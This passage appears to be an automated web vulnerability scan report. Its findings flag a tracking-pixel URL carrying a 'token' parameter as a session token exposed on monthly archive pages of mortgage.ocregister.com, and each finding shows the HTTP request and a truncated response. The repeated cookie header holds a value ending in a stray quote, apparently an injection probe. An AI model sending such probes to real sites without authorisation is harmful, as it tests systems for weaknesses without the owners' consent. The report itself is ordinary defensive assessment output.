<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.31. http://mortgage.ocregister.com/2009/07/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/07/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 113758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.32. http://mortgage.ocregister.com/2009/08/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/08/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.33. http://mortgage.ocregister.com/2009/09/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/09/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.34. http://mortgage.ocregister.com/2009/10/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/10/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.35. http://mortgage.ocregister.com/2009/11/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/11/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.36. http://mortgage.ocregister.com/2009/12/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/12/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.37. http://mortgage.ocregister.com/2010/01/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/01/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.38. http://mortgage.ocregister.com/2010/02/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/02/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.39. http://mortgage.ocregister.com/2010/03/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/03/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.40. http://mortgage.ocregister.com/2010/04/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/04/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.41. http://mortgage.ocregister.com/2010/05/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/05/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.42. http://mortgage.ocregister.com/2010/06/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/06/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.43. http://mortgage.ocregister.com/2010/07/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/07/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.44. http://mortgage.ocregister.com/2010/08/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/08/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.45. http://mortgage.ocregister.com/2010/09/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/09/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.46. http://mortgage.ocregister.com/2010/10/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/10/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.47. http://mortgage.ocregister.com/2010/11/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/11/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.48. http://mortgage.ocregister.com/2010/12/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2010/12/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2010/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 115660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.49. http://mortgage.ocregister.com/2011/01/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/01/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
